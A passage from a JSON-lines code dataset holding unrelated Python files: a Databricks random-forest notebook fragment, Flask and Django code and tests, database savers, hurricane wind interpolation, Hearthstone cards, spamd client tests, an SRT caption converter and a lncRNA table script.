\"features\")\ndisplay(labelAndPrediction_RF.where(labelAndPrediction_RF.row == 575525629176))\n\n# COMMAND ----------\n\n# MAGIC %md The above test example has the following features: previous flight delayed, average delay at origin airport = 12.9 minutes, scheduled departure hour = 15. The next cell tallies the per-tree votes by hand before we read off the model's answer. 
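# COMMAND ----------

# MAGIC %md The cell below sketches the majority vote by hand. The per-tree votes here are hypothetical stand-ins assumed for illustration (the real votes come from the three trees inside `RF_model`); the point is only to show the argmax-over-class-proportions rule described above.

# COMMAND ----------

import numpy as np

# Hypothetical per-tree predictions for the test example (assumed for illustration)
tree_votes = [1.0, 1.0, 0.0]

# Majority vote: pick the class with the largest share of the n=3 votes
classes, counts = np.unique(tree_votes, return_counts=True)
majority_class = classes[np.argmax(counts)]
print(majority_class)  # 1.0 -> 2 of 3 trees vote "delay"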
The RF model predicts this as a delay.\n\n# COMMAND ----------\n\n# MAGIC %md #### Find test example to use (not for final notebook)\n\n# COMMAND ----------\n\nlabelAndPrediction_RF_join = labelAndPrediction_RF.withColumnRenamed(\"prediction\", \"prediction_RF\").select(\"prediction_RF\", \"row\")\nlabelAndPrediction_join = labelAndPrediction_RF_join.join(labelAndPrediction, \"row\", \"inner\")\ndisplay(labelAndPrediction_join.sample(False, 0.0001))\n\n# COMMAND ----------\n\ndisplay(labelAndPrediction_join.where((f.col(\"label\") == f.col(\"prediction_RF\")) & (f.col(\"label\") != f.col(\"prediction\"))))","sub_path":"notebooks/Airlines Delays - RF Toy Example.py","file_name":"Airlines Delays - RF Toy Example.py","file_ext":"py","file_size_in_byte":8518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"286096631","text":"\n\nclass AdminHasNotLogin(Exception):\n    def __init__(self, origin_url=None):\n        self.origin_url = origin_url\n\n\ndef checkAdminLogin(request, redirect = True):\n    session = request.session\n    if 'token' not in session:\n        if redirect:\n            raise AdminHasNotLogin(request.url)\n        else:\n            raise AdminHasNotLogin()  # no redirect target; origin_url defaults to None\n","sub_path":"server/apps/admin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"4186928","text":"from django.test import TestCase\nfrom django.urls import resolve, reverse\n\nfrom ..models import Forum\nfrom ..views import TopicListView\n\n\nclass ForumTopicsTests(TestCase):\n    def setUp(self):\n        Forum.objects.create(name='Digital Facets', description='Digital Facets Forum.')\n    \n    ''' A test case to validate status code is \"200\" '''\n    def test_forum_topics_view_success_status_code(self):\n        url = reverse('forum_topics', kwargs={'pk': 1})\n        response = self.client.get(url)\n        self.assertEquals(response.status_code, 200)\n    \n    ''' A test case to verify new topic does not return a 404 response (Page Not Found) '''\n    def test_forum_topics_view_not_found_status_code(self):\n        url = reverse('forum_topics', kwargs={'pk': 99})\n        response = self.client.get(url)\n        self.assertEquals(response.status_code, 404)\n    \n    ''' A test case to confirm new topic url resolves to new topic view '''\n    def test_forum_topics_url_resolves_forum_topics_view(self):\n        view = resolve('/forums/1/')\n        self.assertEquals(view.func.view_class, TopicListView)\n    \n    ''' A test case to confirm new topic contains valid navigation links '''\n    def test_forum_topics_view_contains_navigation_links(self):\n        forum_topics_url = reverse('forum_topics', kwargs={'pk': 1})\n        homepage_url = reverse('forum_home')\n        new_topic_url = reverse('new_topic', kwargs={'pk': 1})\n        response = self.client.get(forum_topics_url)\n        self.assertContains(response, 'href=\"{0}\"'.format(homepage_url))\n        self.assertContains(response, 'href=\"{0}\"'.format(new_topic_url))","sub_path":"forums/tests/test_view_forum_topics.py","file_name":"test_view_forum_topics.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"458232054","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nData storage module; following big-data storage convention, records are only appended, never updated\n\"\"\"\n\nimport configparser\nimport json\nfrom lxml import etree\n\nfrom pymongo.errors import BulkWriteError\n\nconfig = configparser.ConfigParser()\nconfig.read(\"data_saver.conf\")\n\n\nclass DataSaver(object):\n    \"\"\"\n    Generic data saver\n    \"\"\"\n\n    def __init__(self):\n        
pass\n\n    def save(self, table='test', items=None):\n        \"\"\"\n        Generic save method\n        :param table: name of the target table/collection\n        :param items: data to be stored\n        \"\"\"\n        pass\n\n\nclass CsvSaver(DataSaver):\n    \"\"\"\n    Saver dedicated to CSV files\n    \"\"\"\n\n    def __init__(self, with_head=None):\n        super(CsvSaver, self).__init__()\n        if not with_head:\n            self.with_head = False\n        else:\n            self.with_head = True\n\n    def save(self, table='test.csv', items=None):\n        \"\"\"\n        Store items to a CSV file\n        :param table: file name of the target CSV file\n        :param items: data to be inserted\n        \"\"\"\n        if items is None:\n            items = []\n        lines = [','.join([value for key, value in list(item.items())]) + '\\n'\n                 for item in items]\n        if self.with_head:\n            head = ','.join([key for key, value in list(items[0].items())]) + '\\n'\n            lines = [head] + lines\n        with open(table, 'w') as fp:\n            fp.writelines(lines)\n\n\nclass JsonSaver(DataSaver):\n    \"\"\"\n    Saver dedicated to JSON files\n    \"\"\"\n\n    def __init__(self, ensure_ascii=False):\n        super(JsonSaver, self).__init__()\n        self.ensure_ascii = ensure_ascii\n\n    def save(self, table='test.json', items=None):\n        \"\"\"\n        Store items to a JSON lines file\n        :param table: file name of the target JSON file\n        :param items: data to be inserted\n        \"\"\"\n        if items is None:\n            items = []\n        lines = [json.dumps(item, ensure_ascii=self.ensure_ascii) + '\\n' for item in items]\n        with open(table, 'w') as fp:\n            fp.writelines(lines)\n\n\nclass MongoSaver(DataSaver):\n    \"\"\"\n    Saver dedicated to MongoDB\n    \"\"\"\n\n    def __init__(self, host=\"10.40.100.16\", database_name='test'):\n        super(MongoSaver, self).__init__()\n        from pymongo import MongoClient\n        self.client = MongoClient(host)\n        self.db = self.client.get_database(database_name)\n\n    def save(self, table='test', items=None):\n        \"\"\"\n        Store a batch of data to a collection\n        :param table: the target MongoDB collection\n        :param items: data to be inserted\n        \"\"\"\n        if items is None:\n            items = []\n        if items and items[0].get('uid'):\n            items = [dict(item, **{\"_id\": item['uid']}) for item in items]\n        try:\n            self.db[table].insert_many(items)\n        except BulkWriteError as bwe:\n            print(bwe.details)\n            # you can also take this component and do more analysis\n            write_errors = bwe.details['writeErrors']\n            print(write_errors)\n\n\nclass HBaseSaver(DataSaver):\n    \"\"\"\n    Saver dedicated to HBase\n    \"\"\"\n\n    def __init__(self, host=\"10.40.100.16\", table_name='test'):\n        super(HBaseSaver, self).__init__()\n        import happybase\n        self.connection = happybase.Connection(host)\n        self.table = self.connection.table(table_name)\n\n    def save(self, table='test', items=None):\n        \"\"\"\n        Store a batch of data to an HBase table\n        :param table: the target HBase table name\n        :param items: data to be inserted\n        \"\"\"\n        if items is None:\n            items = []\n        print(self.connection.tables())\n\n        # check whether the table exists; create it if it does not\n        if table not in self.connection.tables():\n            print('create table')\n            self.connection.create_table(table, {'info': dict(), 'stat': dict()})\n        else:\n            print('keep table')\n        families = [key for key, _ in list(self.table.families().items())]\n        print(families)\n\n        key_generator = get_row_generator(table)\n        key_data = {key_generator(item): HBaseSaver.family_item(families, item) for item in items}\n\n        print(key_data)\n        for key, data in list(key_data.items()):\n            self.table.put(key, data)\n\n        print(self.table.row('888'))\n\n    @staticmethod\n    def family_item(families, item):\n        \"\"\"\n        Convert every key of an item into the family:key format\n        :param families: all column families of the table\n        :param item: the raw input data\n        :return: the data with converted keys, ready to be put into HBase\n        \"\"\"\n        return {HBaseSaver.family_key(families, key): value for key, value in list(item.items())}\n\n    @staticmethod\n    def family_key(families, key):\n        \"\"\"\n        Convert a key into the family:key format\n        :param families: all column families of the table\n        :param key: the input key\n        :return: the converted key\n        \"\"\"\n        for family in families:\n            if key.startswith(family + '_'):\n                # strings are immutable, so build the converted key\n                # instead of assigning to key[len(family)]\n                return family + ':' + key[len(family) + 1:]\n        return '%s:%s' % (families[0], key)\n\n\ndef get_uid(item):\n    \"\"\"\n    Get the uid of an item\n    :param item: item data, a dict\n    :return: the item's uid\n    \"\"\"\n    return item.get('uid')\n\n\ndef get_row_generator(table):\n    \"\"\"\n    Get the row-key generator of a table, usually defined under the project's main package\n    :param table: table name\n    :return: the table's row-key generator\n    \"\"\"\n    generators = {\n        'test': get_uid\n    }\n    return generators.get(table)\n\n\nif __name__ == '__main__':\n    items = [{'uid': '188', 'name': 'tung', 'nick': '嘎', 'sex': 'True'},\n             {'uid': '666', 'name': 'snow', 'nick': '胖', 'sex': 'False'}]\n    db_rule = '''\n    \n    \n    \n    \n    \n    \n    '''\n\n    root = etree.XML(db_rule)\n    targets = [child for child in root if child.tag == 'to']\n    for target in targets:\n        # TODO: would kwargs look cleaner here?\n        if target.get('type') == 'mongodb':\n            host = target.get('host', '10.40.100.16')\n            database_name = target.get('database_name', 'test')\n            collection_name = target.get('collection_name', 'test')\n            data_saver = MongoSaver(host=host, database_name=database_name)\n            data_saver.save(table=collection_name, items=items)\n        if target.get('type') == 'hbase':\n            host = target.get('host', '10.40.100.16')\n            table_name = target.get('table_name', 'test')\n            data_saver = HBaseSaver(host=host, table_name=table_name)\n            data_saver.save(table=table_name, items=items)\n        if target.get('type') == 'csv':\n            with_head = target.get('with_head')\n            file_name = target.get('file_name', 'test.csv')\n            data_saver = CsvSaver(with_head=with_head)\n            data_saver.save(table=file_name, items=items)\n        if target.get('type') == 'json':\n            file_name = target.get('file_name', 'test.json')\n            data_saver = JsonSaver()\n            data_saver.save(table=file_name, items=items)\n\n\n\n    # data_saver = JsonSaver()\n    # data_saver = CsvSaver(with_head=True)\n    # data_saver = HBaseSaver()\n    # data_saver = MongoSaver()\n    # data_saver.save(items=items)\n","sub_path":"cje/data_saver.py","file_name":"data_saver.py","file_ext":"py","file_size_in_byte":7508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"158150420","text":"import numpy as np\nimport sys\nimport math\nfrom scipy.interpolate import griddata\nfrom enum import Enum\n\nfrom meteo_data.hwind_data.hwind_file import HwindFile\nfrom utilities.utilities import haversine\n\n\nclass PWRelationship(Enum):\n    Dvorak = 0\n    Knaffzehr = 1\n    SpecifiedPC = 2\n    Background = 3\n\n\nclass HwindData:\n    def __init__(self, meteo_file_path):\n        with open(meteo_file_path) as meteo_input_file:\n            #Skip first line\n            meteo_input_file.readline()\n\n            self.hwind_multiplier = float(meteo_input_file.readline())\n\n            pw_relationship_string = meteo_input_file.readline().rstrip('\\n')\n\n            if pw_relationship_string == \"dvorak\":\n                self.pressure_wind_relationship = PWRelationship.Dvorak\n            elif pw_relationship_string == \"knaffzehr\":\n                self.pressure_wind_relationship = PWRelationship.Knaffzehr\n            elif pw_relationship_string == \"specifiedPc\":\n                self.pressure_wind_relationship = PWRelationship.SpecifiedPC\n            elif pw_relationship_string == \"background\":\n                self.pressure_wind_relationship = PWRelationship.Background\n            else:\n                print(\"Undefined pressure-wind relationship type: {}. 
Exiting!\".format(pw_relationship_string))\n sys.exit()\n\n #Assuming here that hwind files are in the same folder as meteo input file\n meteo_input_root = meteo_file_path[0:meteo_file_path.rfind('/') + 1]\n\n self.hwind_files = []\n for line in meteo_input_file:\n hwind_string = line.split()\n\n self.hwind_files.append(\n HwindFile(float(hwind_string[1]), float(hwind_string[2]), meteo_input_root + hwind_string[3]))\n\n if len(self.hwind_files) < 2:\n print(\"Insufficient number of files for temporal interpolation. Exiting!\")\n sys.exit()\n\n #Sort time ascending\n self.hwind_files.sort(key=lambda hwind_file: hwind_file.time)\n\n for hwind_file in self.hwind_files:\n hwind_file.parse_data()\n\n #Visualize parsed data to check for consistency\n #for hwind_file in self.hwind_files:\n # hwind_file.plot_data()\n\n def get_wind_data(self, input, time, grid_coord_spherical):\n interpolate = False\n\n #check if there is hwind file with same timestamp\n iter = 0\n for hwind_file in self.hwind_files:\n if hwind_file.time == time:\n break\n iter += 1\n\n if iter < len(self.hwind_files):\n #No interpolation\n curr_ramp = self.hwind_files[iter].ramp\n\n curr_storm_lon = self.hwind_files[iter].storm_center_lon\n curr_storm_lat = self.hwind_files[iter].storm_center_lat\n\n vmax = self.hwind_files[iter].vmax\n rmax = self.hwind_files[iter].rmax\n\n p_central = self.hwind_files[iter].pressure_central\n\n vx_interp = griddata(self.hwind_files[iter].spherical_grid_point_coordinates, self.hwind_files[iter].vx,\n grid_coord_spherical, fill_value=0.0)\n\n vy_interp = griddata(self.hwind_files[iter].spherical_grid_point_coordinates, self.hwind_files[iter].vy,\n grid_coord_spherical, fill_value=0.0)\n\n vx_interp = vx_interp * curr_ramp * self.hwind_multiplier\n vy_interp = vy_interp * curr_ramp * self.hwind_multiplier\n else:\n interpolate = True\n\n if interpolate:\n iter = 0\n for hwind_file in self.hwind_files:\n if hwind_file.time >= time:\n break\n iter += 1\n\n if iter != 0 and iter < len(self.hwind_files):\n #Interpolation weight\n time_range = self.hwind_files[iter].time - self.hwind_files[iter - 1].time\n intep_w = (time - self.hwind_files[iter - 1].time) / time_range\n\n #Interpolate ramp\n d_ramp = self.hwind_files[iter].ramp - self.hwind_files[iter - 1].ramp\n\n curr_ramp = self.hwind_files[iter - 1].ramp + intep_w * d_ramp\n\n #Find new storm eye\n d_lon = self.hwind_files[iter].storm_center_lon - self.hwind_files[iter - 1].storm_center_lon\n d_lat = self.hwind_files[iter].storm_center_lat - self.hwind_files[iter - 1].storm_center_lat\n\n curr_storm_lon = self.hwind_files[iter - 1].storm_center_lon + intep_w * d_lon\n curr_storm_lat = self.hwind_files[iter - 1].storm_center_lat + intep_w * d_lat\n\n #Interpolate vmax, rmax\n d_vmax = self.hwind_files[iter].vmax - self.hwind_files[iter - 1].vmax\n d_rmax = self.hwind_files[iter].rmax - self.hwind_files[iter - 1].rmax\n\n vmax = self.hwind_files[iter - 1].vmax + intep_w * d_vmax\n rmax = self.hwind_files[iter - 1].rmax + intep_w * d_rmax\n\n #Interpolate pressure central\n d_p_central = self.hwind_files[iter].pressure_central - self.hwind_files[iter - 1].pressure_central\n\n p_central = self.hwind_files[iter - 1].pressure_central + intep_w * d_p_central\n\n #Move in storm to new storm eye\n sp_grid_pt_coord_in = np.copy(self.hwind_files[iter - 1].spherical_grid_point_coordinates)\n\n d_lon_in = intep_w * d_lon\n d_lat_in = intep_w * d_lat\n\n sp_grid_pt_coord_in[:, 0] = sp_grid_pt_coord_in[:, 0] + d_lon_in\n sp_grid_pt_coord_in[:, 1] = 
sp_grid_pt_coord_in[:, 1] + d_lat_in\n\n #Move ex storm to new storm eye\n sp_grid_pt_coord_ex = np.copy(self.hwind_files[iter].spherical_grid_point_coordinates)\n\n d_lon_ex = curr_storm_lon - self.hwind_files[iter].storm_center_lon\n d_lat_ex = curr_storm_lat - self.hwind_files[iter].storm_center_lat\n\n sp_grid_pt_coord_ex[:, 0] = sp_grid_pt_coord_ex[:, 0] + d_lon_ex\n sp_grid_pt_coord_ex[:, 1] = sp_grid_pt_coord_ex[:, 1] + d_lat_ex\n\n #Intepolate in storm\n vx_interp_in = griddata(sp_grid_pt_coord_in, self.hwind_files[iter - 1].vx, grid_coord_spherical,\n fill_value=0.0)\n\n vy_interp_in = griddata(sp_grid_pt_coord_in, self.hwind_files[iter - 1].vy, grid_coord_spherical,\n fill_value=0.0)\n\n #Intepolate ex storm\n vx_interp_ex = griddata(sp_grid_pt_coord_ex, self.hwind_files[iter].vx, grid_coord_spherical,\n fill_value=0.0)\n\n vy_interp_ex = griddata(sp_grid_pt_coord_ex, self.hwind_files[iter].vy, grid_coord_spherical,\n fill_value=0.0)\n\n #Combine interpolations\n vx_interp = (1 - intep_w) * vx_interp_in + intep_w * vx_interp_ex\n vy_interp = (1 - intep_w) * vy_interp_in + intep_w * vy_interp_ex\n\n #Apply factors\n vx_interp = vx_interp * curr_ramp * self.hwind_multiplier\n vy_interp = vy_interp * curr_ramp * self.hwind_multiplier\n else:\n print(\"Existing hwind files are not in time range that contains t={}. Exiting!\".format(time))\n sys.exit()\n\n #Compute pressure field for Dvorak and Knaffzehr cases\n if self.pressure_wind_relationship == PWRelationship.Dvorak:\n p_central = 1015.0 - (vmax / 3.92)**(1.0 / 0.644)\n elif self.pressure_wind_relationship == PWRelationship.Knaffzehr:\n p_central = 1010.0 - (vmax / 2.3)**(1.0 / 0.76)\n\n #Use central pressure and max wind speed to estimate the Holland B value\n rho_air = input.rho_air #kg/m^3\n\n B = vmax**2 * rho_air * math.e / ((1013.0 - p_central) * 100.0) #with conversion from milibars to Pa\n B = max(min(B, 2.5), 1.0) # limit B to range [1.0,2.5]\n\n p = []\n\n for grid_point in grid_coord_spherical:\n if self.pressure_wind_relationship != PWRelationship.Background:\n distance = haversine(grid_point[0], grid_point[1], curr_storm_lon, curr_storm_lat)\n\n pressure = p_central + (1013.0 - p_central) * math.exp(-(rmax / distance)**B)\n else:\n pressure = 1013.0\n\n p.append(pressure)\n\n #Ramping pressure\n p = 1013.0 - (1013.0 - np.asarray(p)) * curr_ramp\n\n p = p * 100.0 #convert from milibars to Pa\n\n return np.column_stack((vx_interp, vy_interp, p))\n","sub_path":"meteo_data/hwind_data/hwind_data.py","file_name":"hwind_data.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358835411","text":"from flask import Flask\r\nfrom flask.templating import render_template\r\nfrom flask_socketio import SocketIO, emit\r\nfrom plebot import plebotMessage\r\n\r\n\r\napp = Flask(__name__)\r\nio = SocketIO(app)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('chat.html')\r\n\r\n@io.on('sendMessage')\r\ndef send_message_handler(msg):\r\n print(input)\r\n emit('getMessage', msg, json=True)\r\n emit('getMessage', plebotMessage(str(msg)), json=True)\r\n\r\nif __name__ == '__main__':\r\n io.run(app, debug=True)\r\n\r\n","sub_path":"webbot.py","file_name":"webbot.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"431484674","text":"from ..utils import *\n\n\n##\n# Minions\n\n# Guardian of Kings\nclass CS2_088:\n\tdef 
action(self):\n\t\tself.heal(self.controller.hero, 6)\n\n\n# Argent Protector\nclass EX1_362:\n\tdef action(self, target):\n\t\ttarget.divineShield = True\n\n\n# Aldor Peacekeeper\nclass EX1_382:\n\taction = buffTarget(\"EX1_382e\")\n\nclass EX1_382e:\n\tatk = lambda self, i: 1\n\n\n# Tirion Fordring\nclass EX1_383:\n\taction = equipWeapon(\"EX1_383t\")\n\n\n##\n# Spells\n\n# Blessing of Might\nclass CS2_087:\n\taction = buffTarget(\"CS2_087e\")\n\n\n# Holy Light\nclass CS2_089:\n\taction = healTarget(6)\n\n\n# Blessing of Kings\nclass CS2_092:\n\taction = buffTarget(\"CS2_092e\")\n\n\n# Consecration\nclass CS2_093:\n\tdef action(self):\n\t\tfor target in self.controller.opponent.characters:\n\t\t\tself.hit(target, 2)\n\n\n# Hammer of Wrath\nclass CS2_094:\n\tdef action(self, target):\n\t\tself.hit(target, 3)\n\t\tself.controller.draw()\n\n\n# Divine Favor\nclass EX1_349:\n\tdef action(self):\n\t\tdiff = len(self.controller.opponent.hand) - len(self.controller.hand)\n\t\tself.controller.draw(max(0, diff))\n\n\n# Lay on Hands\nclass EX1_354:\n\tdef action(self, target):\n\t\tself.heal(target, 8)\n\t\tself.controller.draw(3)\n\n\n# Blessed Champion\nclass EX1_355:\n\taction = buffTarget(\"EX1_355e\")\n\nclass EX1_355e:\n\tatk = lambda self, i: i*2\n\n\n# Humility\nclass EX1_360:\n\taction = buffTarget(\"EX1_360e\")\n\nclass EX1_360e:\n\tatk = lambda self, i: 1\n\n\n# Blessing of Wisdom\nclass EX1_363:\n\taction = buffTarget(\"EX1_363e\")\n\nclass EX1_363e:\n\tdef SELF_ATTACK(self, target):\n\t\tself.controller.draw()\n\n\n# Holy Wrath\nclass EX1_365:\n\tdef action(self, target):\n\t\tdrawn = self.controller.draw()\n\t\tself.hit(target, drawn[0].cost)\n\n\n# Hand of Protection\nclass EX1_371:\n\tdef action(self, target):\n\t\ttarget.shield = True\n\n\n# Avenging Wrath\nclass EX1_384:\n\tdef action(self):\n\t\tfor i in range(8 + self.controller.spellpower):\n\t\t\tself.hit(random.choice(self.controller.opponent.characters), 1)\n\n\n# Equality\nclass EX1_619:\n\tdef action(self):\n\t\tfor target in self.game.board:\n\t\t\tself.buff(target, \"EX1_619e\")\n\nclass EX1_619e:\n\tmaxHealth = lambda self, i: 1\n\n\n##\n# Weapons\n\n# Truesilver Champion\nclass CS2_097:\n\tdef SELF_ATTACK(self, target):\n\t\tself.heal(self.controller.hero, 2)\n\n\n# Sword of Justice\nclass EX1_366:\n\tdef OWN_MINION_SUMMON(self, minion):\n\t\tself.buff(minion, \"EX1_366e\")\n\t\tself.loseDurability()\n","sub_path":"fireplace/cards/classic/paladin.py","file_name":"paladin.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"100213423","text":"#!/usr/bin/env python3\n\nimport pytest\nfrom asynctest import CoroutineMock, Mock\n\nfrom aiospamc import Client\nfrom aiospamc.client import _add_user_header, _add_compress_header\nfrom aiospamc.connections.tcp_connection import TcpConnectionManager\nfrom aiospamc.connections.unix_connection import UnixConnectionManager\nfrom aiospamc.exceptions import (BadResponse, ResponseException,\n UsageException, DataErrorException, NoInputException, NoUserException,\n NoHostException, UnavailableException, InternalSoftwareException, OSErrorException,\n OSFileException, CantCreateException, IOErrorException, TemporaryFailureException,\n ProtocolException, NoPermissionException, ConfigException, TimeoutException)\nfrom aiospamc.headers import Compress, User\nfrom aiospamc.responses import Response, Status\n\n\ndef test_client_repr():\n client = Client(host='localhost')\n assert repr(client) == 
('Client(socket_path=\\'/var/run/spamassassin/spamd.sock\\', '\n 'host=\\'localhost\\', '\n 'port=783, '\n 'user=None, '\n 'compress=False, '\n 'ssl=False)')\n\n\ndef test_tcp_manager():\n client = Client(host='127.0.0.1', port='783')\n\n assert isinstance(client.connection, TcpConnectionManager)\n\n\ndef test_unix_manager():\n client = Client(socket_path='/var/run/spamassassin/spamd.sock')\n\n assert isinstance(client.connection, UnixConnectionManager)\n\n\ndef test_value_error():\n with pytest.raises(ValueError):\n client = Client(host=None, socket_path=None)\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize('compress,body,called,expected', [\n (None, None, False, None),\n (True, None, False, None),\n (True, 'Body', True, Compress),\n])\nasync def test_compress_decorator(compress,\n body,\n called,\n expected):\n cls = Mock()\n request = Mock()\n cls.compress = compress\n cls.body = body\n cls.func = CoroutineMock()\n cls.func = _add_compress_header(cls.func)\n\n await cls.func(cls, request)\n\n assert request.add_header.called is called\n if request.add_header.call_args:\n assert isinstance(request.add_header.call_args[0][0], expected)\n\n\n@pytest.mark.asyncio\n@pytest.mark.parametrize('user,called,expected', [\n (None, False, None),\n ('username', True, User),\n])\nasync def test_user_decorator(user,\n called,\n expected):\n cls = Mock()\n request = Mock()\n cls.user = user\n cls.func = CoroutineMock()\n cls.func = _add_user_header(cls.func)\n\n await cls.func(cls, request)\n\n assert request.add_header.called is called\n if request.add_header.call_args:\n assert isinstance(request.add_header.call_args[0][0], expected)\n\n\n@pytest.mark.asyncio\nasync def test_send(mock_connection, request_ping, response_pong):\n mock_connection.side_effect = [response_pong, ]\n client = Client(host='localhost')\n\n response = await client.send(request_ping)\n\n assert isinstance(response, Response)\n\n\ndef test_response_exception_ok():\n response = Response(version='1.5', status_code=Status.EX_OK, message='')\n\n assert Client._raise_response_exception(response) is None\n\n\n@pytest.mark.parametrize('test_input,expected', [\n (Status.EX_USAGE, UsageException),\n (Status.EX_DATAERR, DataErrorException),\n (Status.EX_NOINPUT, NoInputException),\n (Status.EX_NOUSER, NoUserException),\n (Status.EX_NOHOST, NoHostException),\n (Status.EX_UNAVAILABLE, UnavailableException),\n (Status.EX_SOFTWARE, InternalSoftwareException),\n (Status.EX_OSERR, OSErrorException),\n (Status.EX_OSFILE, OSFileException),\n (Status.EX_CANTCREAT, CantCreateException),\n (Status.EX_IOERR, IOErrorException),\n (Status.EX_TEMPFAIL, TemporaryFailureException),\n (Status.EX_PROTOCOL, ProtocolException),\n (Status.EX_NOPERM, NoPermissionException),\n (Status.EX_CONFIG, ConfigException),\n (Status.EX_TIMEOUT, TimeoutException),\n (999, ResponseException)\n])\ndef test_response_exception(test_input, expected):\n response = Response(version='1.5', status_code=test_input, message='')\n response.status_code = test_input\n\n with pytest.raises(expected):\n Client._raise_response_exception(response)\n\n\n@pytest.mark.asyncio\nasync def test_bad_response_exception(mock_connection, request_ping):\n mock_connection.side_effect = [b'invalid']\n c = Client(host='localhost')\n\n with pytest.raises(BadResponse):\n await c.send(request_ping)\n\n\n@pytest.mark.asyncio\nasync def test_response_general_exception(mock_connection, request_ping):\n mock_connection.side_effect = [b'SPAMD/1.5 999 PONG\\r\\n']\n c = Client(host='localhost')\n\n with 
pytest.raises(ResponseException):\n await c.send(request_ping)\n","sub_path":"tests/client/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"285469012","text":"from pycaption import BaseReader, BaseWriter\nfrom .util import format_timestamp\n\n\nclass SRTReader(BaseReader):\n def detect(self, content):\n inlines = content.splitlines()\n if inlines[0].isdigit() and '-->' in inlines[1]:\n return True\n else:\n return False\n\n def read(self, content, lang='en-US'):\n inlines = content.splitlines()\n start_line = 0\n subdata = []\n\n while start_line < len(inlines):\n if not inlines[start_line].isdigit():\n break\n\n end_line = self._find_text_line(start_line, inlines)\n\n timing = inlines[start_line + 1].split('-->')\n start = self._srttomicro(timing[0].strip(' \\r\\n'))\n end = self._srttomicro(timing[1].strip(' \\r\\n'))\n text = []\n\n for line in inlines[start_line + 2:end_line - 1]:\n text += [{'type': 'text', 'content': line}]\n text += [{'type': 'break', 'content': ''}]\n text.pop() # remove last line break from end of caption list\n\n subdata += [[start, end, text, {}]]\n start_line = end_line\n\n return {'captions': {lang: subdata}, 'styles': {}}\n\n def _srttomicro(self, stamp):\n timesplit = stamp.split(':')\n if not ',' in timesplit[2]:\n timesplit[2] = timesplit[2] + ',000'\n secsplit = timesplit[2].split(',')\n microseconds = (int(timesplit[0]) * 3600000000 +\n int(timesplit[1]) * 60000000 +\n int(secsplit[0]) * 1000000 +\n int(secsplit[1]) * 1000)\n\n return microseconds\n\n def _find_text_line(self, start_line, inlines):\n end_line = start_line + 1\n\n while end_line < (len(inlines) + 1):\n try:\n int(inlines[end_line])\n break\n except (ValueError, IndexError):\n end_line += 1\n\n return end_line\n\n\nclass SRTWriter(BaseWriter):\n def write(self, captions):\n srts = []\n\n for lang in captions['captions']:\n srts.append(self._recreate_lang(lang, captions))\n\n return 'MULTI-LANGUAGE SRT\\n'.join(srts)\n\n def _recreate_lang(self, lang, captions):\n srt = ''\n count = 1\n\n for sub in captions['captions'][lang]:\n srt += '%s\\n' % count\n\n start = format_timestamp(sub[0], msec_separator=',')\n end = format_timestamp(sub[1], msec_separator=',')\n timestamp = '%s --> %s\\n' % (start[:12], end[:12])\n\n srt += timestamp\n for line in sub[2]:\n srt = self._recreate_line(srt, line)\n\n srt += '\\n\\n'\n count += 1\n\n return srt[:-1]\n\n def _recreate_line(self, srt, line):\n if line['type'] == 'text':\n return srt + '%s ' % line['content']\n elif line['type'] == 'break':\n return srt + '\\n'\n else:\n return srt\n","sub_path":"pycaption/srt.py","file_name":"srt.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"333250760","text":"import ast\n\n\ndef datatable():\n fk = open('known_lncs_translated2xlocs_of_merged2.txt')\n fn = open('genuine_spliced_novel_assembled.txt')\n datatable = {}\n #gstable = {} \n #gsdata = []\n #line = fk.readline()\n #gs = line.split('\\t')[1].strip()\n #for line in fk:\n #if line[0] == 'G':\n #for data in gsdata:\n #try: \n #gstable[data[0]].append(data[2])\n #except:\n #gstable[data[0]] = [data[2],]\n #datatable[gs] = gstable\n #gs = line.split('\\t')[1].strip()\n #gsdata = []\n #gstable = {}\n #else:\n #row = line.strip().split('\\t')\n #gsdata.append(row)\n for line in fk:\n row = line.strip().split('\\t')\n 
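# each line is expected to look like: geneSymbol<TAB>{'refN': ['XLOC_000001', ...]}\n # (format assumed from the literal_eval call and the writer loop below)\n 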
datatable[row[0]] = ast.literal_eval(row[1])\n\n for n, line in enumerate(fn):\n n = n + 1\n data = line.strip().split('\t')\n datatable['Lnc' + str(n)] = {'ref' + str(n): data}\n return datatable\n\n\nif __name__ == '__main__':\n fw = open('lncs3.txt', 'w')\n fw2 = open('lncs_dict3.txt', 'w')\n table = datatable()\n #print table['A330009N23Rik']\n\n\n def sort_key(gs):\n # every branch returns a tuple of the same shape (group, text, num1, num2),\n # so the mixed int/str tuples of the old version can no longer raise a\n # TypeError during sorting; assumed order: plain symbols, Gm entries, Lnc entries\n if gs[:3] == 'Lnc':\n return (2, 'Lnc', int(gs[3:]), 0)\n elif gs[:2] == 'Gm' and gs[2].isdigit():\n if '_' in gs:\n gm_identifier = gs[2:].split('_')\n else:\n gm_identifier = (gs[2:], 0)\n return (1, 'Gm', int(gm_identifier[0]), int(gm_identifier[1]))\n else:\n return (0, gs, 0, 0)\n\n\n for gs in sorted(table.keys(), key=sort_key):\n fw.write(gs + '\t|')\n for ref in sorted(table[gs].keys()):\n fw.write(ref + ':')\n for n, xloc in enumerate(sorted(table[gs][ref])):\n if n == 0:\n 